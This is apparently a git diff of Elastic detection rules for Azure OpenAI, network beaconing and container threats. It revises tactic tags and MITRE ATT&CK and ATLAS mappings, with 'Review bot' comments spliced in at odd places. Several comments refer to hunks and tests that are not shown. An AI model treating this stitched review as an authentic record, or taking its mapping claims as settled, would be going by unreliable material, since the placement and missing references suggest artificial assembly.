diff --git a/rules/integrations/azure_openai/azure_openai_denial_of_ml_service_detection.toml b/rules/integrations/azure_openai/azure_openai_denial_of_ml_service_detection.toml
index 46cd5e6b95a..4934540a281 100644
--- a/rules/integrations/azure_openai/azure_openai_denial_of_ml_service_detection.toml
+++ b/rules/integrations/azure_openai/azure_openai_denial_of_ml_service_detection.toml
@@ -2,7 +2,7 @@ creation_date = "2025/02/25"
 integration = ["azure_openai"]
 maturity = "production"
-updated_date = "2025/09/25"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -65,14 +65,7 @@ For more information on streaming events, see the Azure OpenAI documentation:
 https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/stream-monitoring-data-event-hubs
 """
 severity = "medium"
-tags = [
- "Domain: LLM",
- "Data Source: Azure OpenAI",
- "Data Source: Azure Event Hubs",
- "Use Case: Denial of Service",
- "Mitre Atlas: T0029",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: LLM", "Tactic: Impact", "Data Source: Azure OpenAI", "Data Source: Azure Event Hubs", "Use Case: Denial of Service", "Mitre Atlas: T0029", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
 
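Review bot: The custom-domain rule is left with no `rule.threat` mapping at all — the `@@ -86,20 +86,3 @@` hunk deletes the T1584.001 / TA0042 entry and nothing replaces it — while its filename still says resource_development. Its `tags` are not in this hunk, so I cannot tell whether a `Tactic: Resource Development` tag survives; if it does, the new orphan-tag check in `_mitre_tactic_tag_gaps` will presumably report it. If the objection was that T1584.001 (compromising a third party's domain) does not fit a domain the attacker registers and verifies in the tenant, the acquire-infrastructure counterpart for domains under TA0042 is the natural replacement rather than an empty mapping — verify the exact sub-technique id against the ATT&CK matrix before adding it. The rule is still `maturity = "development"`, so this is not yet a production regression, but it should not be merged unmapped.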
@@ -98,3 +91,33 @@ from logs-azure_openai.logs-*
 | sort Esql.event_count desc
 '''
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1499"
+name = "Endpoint Denial of Service"
+reference = "https://attack.mitre.org/techniques/T1499/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1499.003"
+name = "Application Exhaustion Flood"
+reference = "https://attack.mitre.org/techniques/T1499/003/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
+
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0059"
+name = "Erode Dataset Integrity"
+reference = "https://atlas.mitre.org/techniques/AML.T0059/"
+
+[rule.threat.tactic]
+id = "AML.TA0011"
+name = "Impact"
+reference = "https://atlas.mitre.org/tactics/AML.TA0011/"
diff --git a/rules/integrations/azure_openai/azure_openai_insecure_output_handling_detection.toml b/rules/integrations/azure_openai/azure_openai_insecure_output_handling_detection.toml
index 80c55337e22..f626db07f8c 100644
--- a/rules/integrations/azure_openai/azure_openai_insecure_output_handling_detection.toml
+++ b/rules/integrations/azure_openai/azure_openai_insecure_output_handling_detection.toml
@@ -2,7 +2,7 @@ creation_date = "2025/02/25"
 integration = ["azure_openai"]
 maturity = "production"
-updated_date = "2025/09/25"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
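Review bot: The ATLAS entry added here is `id = "AML.T0059"` / `name = "Erode Dataset Integrity"`, but this is the denial-of-ML-service rule and the tag kept on the same file in the preceding hunk still says `"Mitre Atlas: T0029"`; those two cannot both be right for one rule. Unless the detection logic changed (only `| sort Esql.event_count desc` of the query is visible here), the structured entry should carry the denial-of-service technique the tag already names — `id = "AML.T0029"` with its matching name and `https://atlas.mitre.org/techniques/AML.T0029/` reference — or the tag must be changed with it. Keeping the free-text `Mitre Atlas:` tag next to a structured ATLAS entry also leaves two places to drift; once the entry is correct, consider dropping the tag. The ATT&CK side (T1499.003 under TA0040) reads fine for a request-flood detection.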
@@ -61,13 +61,7 @@ For more information on streaming events, see the Azure OpenAI documentation:
 https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/stream-monitoring-data-event-hubs
 """
 severity = "low"
-tags = [
- "Domain: LLM",
- "Data Source: Azure OpenAI",
- "Data Source: Azure Event Hubs",
- "Use Case: Insecure Output Handling",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: LLM", "Tactic: Impact", "Data Source: Azure OpenAI", "Data Source: Azure Event Hubs", "Use Case: Insecure Output Handling", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
 
@@ -92,3 +86,15 @@ from logs-azure_openai.logs-*
 Esql.event_count desc
 '''
 
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0048"
+name = "External Harms"
+reference = "https://atlas.mitre.org/techniques/AML.T0048/"
+
+[rule.threat.tactic]
+id = "AML.TA0011"
+name = "Impact"
+reference = "https://atlas.mitre.org/tactics/AML.TA0011/"
diff --git a/rules/integrations/azure_openai/azure_openai_model_theft_detection.toml b/rules/integrations/azure_openai/azure_openai_model_theft_detection.toml
index d5cb5f71268..0ed1e394199 100644
--- a/rules/integrations/azure_openai/azure_openai_model_theft_detection.toml
+++ b/rules/integrations/azure_openai/azure_openai_model_theft_detection.toml
@@ -2,7 +2,7 @@ creation_date = "2025/02/25"
 integration = ["azure_openai"]
 maturity = "production"
-updated_date = "2025/09/25"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -62,14 +62,7 @@ streaming events, see the Azure OpenAI documentation:
 https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/stream-monitoring-data-event-hubs
 """
 severity = "medium"
-tags = [
- "Domain: LLM",
- "Data Source: Azure OpenAI",
- "Data Source: Azure Event Hubs",
- "Use Case: Model Theft",
- "Mitre Atlas: T0044",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: LLM", "Tactic: Credential Access", "Tactic: Exfiltration", "Tactic: AI Model Access", "Data Source: Azure OpenAI", "Data Source: Azure Event Hubs", "Use Case: Model Theft", "Mitre Atlas: T0044", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
 
@@ -98,3 +91,54 @@ from logs-azure_openai.logs-*
 Esql.event_count desc
 '''
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1567"
+name = "Exfiltration Over Web Service"
+reference = "https://attack.mitre.org/techniques/T1567/"
+
+[rule.threat.tactic]
+id = "TA0010"
+name = "Exfiltration"
+reference = "https://attack.mitre.org/tactics/TA0010/"
+
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0040"
+name = "AI Model Inference API Access"
+reference = "https://atlas.mitre.org/techniques/AML.T0040/"
+
+[rule.threat.tactic]
+id = "AML.TA0000"
+name = "AI Model Access"
+reference = "https://atlas.mitre.org/tactics/AML.TA0000/"
+
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0024"
+name = "Exfiltration via AI Inference API"
+reference = "https://atlas.mitre.org/techniques/AML.T0024/"
+
+[rule.threat.tactic]
+id = "AML.TA0010"
+name = "Exfiltration"
+reference = "https://atlas.mitre.org/tactics/AML.TA0010/"
diff --git a/rules/integrations/beaconing/command_and_control_beaconing.toml b/rules/integrations/beaconing/command_and_control_beaconing.toml
index f89fe47c8c3..dc81f134f13 100644
--- a/rules/integrations/beaconing/command_and_control_beaconing.toml
+++ b/rules/integrations/beaconing/command_and_control_beaconing.toml
@@ -2,7 +2,7 @@ creation_date = "2023/09/22"
 integration = ["beaconing", "endpoint", "network_traffic"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
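Review bot: The tag `"Mitre Atlas: T0044"` retained in the preceding tags hunk no longer agrees with the structured ATLAS entries added here, which use `AML.T0040` and `AML.T0024`; either the tag is stale or one of the new entries is, and the two should be reconciled in the same commit rather than left to drift. The ATT&CK `T1552` Unsecured Credentials entry under Credential Access is also hard to justify for a rule that reads Azure OpenAI inference logs (`from logs-azure_openai.logs-*` is all the hunk shows of the query): if "model theft" here means bulk querying of the inference API, the two ATLAS entries plus T1567 already describe it, and the TA0006 entry could be dropped together with `"Tactic: Credential Access"` — please confirm against the full query. Note that this block now has two entries named "Exfiltration" (TA0010 and AML.TA0010), which relies on the framework-aware duplicate check introduced in the test changes.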
@@ -95,19 +95,13 @@ Statistical models analyze network traffic patterns to identify anomalies indica
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1102"
-name = "Web Service"
-reference = "https://attack.mitre.org/techniques/T1102/"
-[[rule.threat.technique.subtechnique]]
-id = "T1102.002"
-name = "Bidirectional Communication"
-reference = "https://attack.mitre.org/techniques/T1102/002/"
-
+[[rule.threat.technique]]
+id = "T1071"
+name = "Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1071/"
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-
diff --git a/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml b/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml
index 0fe0d4d7320..62075e640fe 100644
--- a/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml
+++ b/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml
@@ -2,7 +2,7 @@ creation_date = "2023/09/22"
 integration = ["beaconing", "endpoint", "network_traffic"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -90,19 +90,13 @@ Statistical models analyze network traffic patterns to identify anomalies indica
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1102"
-name = "Web Service"
-reference = "https://attack.mitre.org/techniques/T1102/"
-[[rule.threat.technique.subtechnique]]
-id = "T1102.002"
-name = "Bidirectional Communication"
-reference = "https://attack.mitre.org/techniques/T1102/002/"
-
+[[rule.threat.technique]]
+id = "T1071"
+name = "Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1071/"
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-
diff --git a/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml b/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml
index 98c2b0a4e53..9b376e4d6e1 100644
--- a/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml
+++ b/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/27"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -72,9 +72,9 @@ process.interactive == true and container.id like "?*"
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1572"
-name = "Protocol Tunneling"
-reference = "https://attack.mitre.org/techniques/T1572/"
+id = "T1090"
+name = "Proxy"
+reference = "https://attack.mitre.org/techniques/T1090/"
 
 [rule.threat.tactic]
 id = "TA0011"
diff --git a/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml b/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml
index 5d448150ea9..1550a8b19f4 100644
--- a/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml
+++ b/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/10"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -65,15 +65,7 @@ references = [
 risk_score = 47
 rule_id = "a8b08d2d-6dfe-453f-87d1-11d5fc3ec746"
 severity = "medium"
-tags = [
- "Data Source: Elastic Defend for Containers",
- "Domain: Container",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Command and Control",
- "Tactic: Execution",
- "Resources: Investigation Guide",
-]
+tags = ["Tactic: Command and Control", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -95,35 +87,12 @@ process where host.os.type == "linux" and event.type == "start" and event.action
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Command and Control"
- id = "TA0011"
- reference = "https://attack.mitre.org/tactics/TA0011/"
-
- [[rule.threat.technique]]
- name = "Application Layer Protocol"
- id = "T1071"
- reference = "https://attack.mitre.org/techniques/T1071/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Web Protocols"
- id = "T1071.001"
- reference = "https://attack.mitre.org/techniques/T1071/001/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
- [rule.threat.tactic]
- name = "Execution"
- id = "TA0002"
- reference = "https://attack.mitre.org/tactics/TA0002/"
-
- [[rule.threat.technique]]
- id = "T1059"
- name = "Command and Scripting Interpreter"
- reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
 
- [[rule.threat.technique.subtechnique]]
- name = "Unix Shell"
- id = "T1059.004"
- reference = "https://attack.mitre.org/techniques/T1059/004/"
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml b/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml
index 0e1b024eb19..c2d8e83ee8d 100644
--- a/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml
+++ b/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/10"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -96,6 +96,11 @@ process where event.type == "start" and event.action == "exec" and (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1090"
+name = "Proxy"
+reference = "https://attack.mitre.org/techniques/T1090/"
+
 [[rule.threat.technique]]
 id = "T1572"
 name = "Protocol Tunneling"
diff --git a/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml b/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml
index 67fbebdda38..a2427964654 100644
--- a/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml
+++ b/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/15"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -107,24 +107,6 @@ process.args like~ (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1552.001"
-name = "Credentials In Files"
-reference = "https://attack.mitre.org/techniques/T1552/001/"
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1560"
 name = "Archive Collected Data"
@@ -139,3 +121,21 @@ reference = "https://attack.mitre.org/techniques/T1560/001/"
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1552.001"
+name = "Credentials In Files"
+reference = "https://attack.mitre.org/techniques/T1552/001/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml b/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml
index 6466f00e4a8..1a58af92a38 100644
--- a/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml
+++ b/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/15"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -60,14 +60,7 @@ references = ["https://sysdig.com/blog/cve-2021-25741-kubelet-falco/"]
 risk_score = 47
 rule_id = "9661ed8b-001c-40dc-a777-0983b7b0c91a"
 severity = "medium"
-tags = [
- "Data Source: Elastic Defend for Containers",
- "Domain: Container",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Resources: Investigation Guide",
-]
+tags = ["Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -119,3 +112,16 @@ reference = "https://attack.mitre.org/techniques/T1552/001/"
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1083"
+name = "File and Directory Discovery"
+reference = "https://attack.mitre.org/techniques/T1083/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml b/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml
index 1dc98471512..005de67e7ad 100644
--- a/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml
+++ b/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/06"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -101,6 +101,11 @@ any where host.os.type == "linux" and process.interactive == true and container.
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1528"
+name = "Steal Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1528/"
+
 [[rule.threat.technique]]
 id = "T1552"
 name = "Unsecured Credentials"
diff --git a/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml b/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml
index a3e3f977696..3b5a90b50ca 100644
--- a/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml
+++ b/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/05"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -130,45 +130,35 @@ sequence by process.parent.entity_id, container.id with maxspan=3s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
- [rule.threat.tactic]
- name = "Defense Evasion"
- id = "TA0005"
- reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1027"
+name = "Obfuscated Files or Information"
+reference = "https://attack.mitre.org/techniques/T1027/"
 
- [[rule.threat.technique]]
- name = "Obfuscated Files or Information"
- id = "T1027"
- reference = "https://attack.mitre.org/techniques/T1027/"
+[[rule.threat.technique.subtechnique]]
+id = "T1027.010"
+name = "Command Obfuscation"
+reference = "https://attack.mitre.org/techniques/T1027/010/"
 
- [[rule.threat.technique]]
- name = "Deobfuscate/Decode Files or Information"
- id = "T1140"
- reference = "https://attack.mitre.org/techniques/T1140/"
+[[rule.threat.technique]]
+id = "T1140"
+name = "Deobfuscate/Decode Files or Information"
+reference = "https://attack.mitre.org/techniques/T1140/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
- [rule.threat.tactic]
- name = "Execution"
- id = "TA0002"
- reference = "https://attack.mitre.org/tactics/TA0002/"
-
- [[rule.threat.technique]]
- id = "T1059"
- name = "Command and Scripting Interpreter"
- reference = "https://attack.mitre.org/techniques/T1059/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Unix Shell"
- id = "T1059.004"
- reference = "https://attack.mitre.org/techniques/T1059/004/"
-
- [[rule.threat.technique]]
- name = "User Execution"
- id = "T1204"
- reference = "https://attack.mitre.org/techniques/T1204/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Malicious File"
- id = "T1204.002"
- reference = "https://attack.mitre.org/techniques/T1204/002/"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml b/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml
index 5da9a158df8..a9a634d7f81 100644
--- a/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml
+++ b/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/05"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -55,15 +55,7 @@ references = [
 risk_score = 73
 rule_id = "1dc56174-5d02-4ca4-af92-e391f096fb21"
 severity = "high"
-tags = [
- "Data Source: Elastic Defend for Containers",
- "Domain: Container",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Tactic: Execution",
- "Resources: Investigation Guide",
-]
+tags = ["Tactic: Command and Control", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -108,6 +100,19 @@ sequence by container.id, user.id with maxspan=10s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1070"
 name = "Indicator Removal"
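Review bot: The rebuilt Execution entry for defense_evasion_decoded_payload_piped_to_interpreter.toml keeps T1059 but drops the T1059.004 Unix Shell sub-technique the old entry carried, while sibling pipe-to-shell rules in this same diff (the file-creation cradle context lines and execution_payload_downloaded_and_piped_to_shell.toml) still list it, so this rule becomes the odd one out. If the removal is deliberate, a line in the commit description saying so would save the next reviewer a search; otherwise re-add a `[[rule.threat.technique.subtechnique]]` block with `id = "T1059.004"` under the T1059 technique. This file's `tags` list is not touched anywhere in the diff, so it is also worth confirming it still matches the Defense Evasion and Execution tactics that remain here.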
@@ -136,16 +141,6 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
 
-[[rule.threat.technique]]
-id = "T1204"
-name = "User Execution"
-reference = "https://attack.mitre.org/techniques/T1204/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1204.002"
-name = "Malicious File"
-reference = "https://attack.mitre.org/techniques/T1204/002/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
diff --git a/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml b/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml
index 0538c4cd9c4..8ac47055373 100644
--- a/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml
+++ b/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/10"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -75,43 +75,30 @@ process where event.type == "start" and event.action == "exec" and process.inter
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1564"
+name = "Hide Artifacts"
+reference = "https://attack.mitre.org/techniques/T1564/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1564.001"
+name = "Hidden Files and Directories"
+reference = "https://attack.mitre.org/techniques/T1564/001/"
+
 [rule.threat.tactic]
-name = "Defense Evasion"
 id = "TA0005"
+name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
 
-[[rule.threat.technique]]
-name = "Reflective Code Loading"
-id = "T1620"
-reference = "https://attack.mitre.org/techniques/T1620/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[rule.threat.tactic]
-name = "Execution"
-id = "TA0002"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+id = "T1609"
+name = "Container Administration Command"
+reference = "https://attack.mitre.org/techniques/T1609/"
 
 [rule.threat.tactic]
-name = "Command and Control"
-id = "TA0011"
-reference = "https://attack.mitre.org/tactics/TA0011/"
-
-[[rule.threat.technique]]
-name = "Application Layer Protocol"
-id = "T1071"
-reference = "https://attack.mitre.org/techniques/T1071/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml b/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml
index f84f1a58ad4..3de8c254263 100644
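Review bot: The Command and Control entry (TA0011 / T1071) is removed from defense_evasion_interactive_process_execution_from_suspicious_directory.toml here, but no hunk in this diff touches that file's `tags` list, unlike every other rule in the series where the `Tactic:` tags were rewritten together with the threat mapping. If the tag list still contains `"Tactic: Command and Control"` the tags and the threat mapping now disagree for this rule; please confirm the tags are already in sync or add the missing tag hunk. Replacing T1620 Reflective Code Loading with T1564.001 Hidden Files and Directories is also a substantive reinterpretation of what the query detects, so a short rationale in the commit description would help whoever next tunes this rule.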
--- a/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml
+++ b/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/15"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -66,14 +66,7 @@ references = [
 risk_score = 73
 rule_id = "342f834b-21a6-41bf-878c-87d116eba3ee"
 severity = "high"
-tags = [
- "Data Source: Elastic Defend for Containers",
- "Domain: Container",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Resources: Investigation Guide",
-]
+tags = ["Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -99,3 +92,21 @@ reference = "https://attack.mitre.org/techniques/T1574/006/"
 id = "TA0005"
 name = "Defense Evasion"
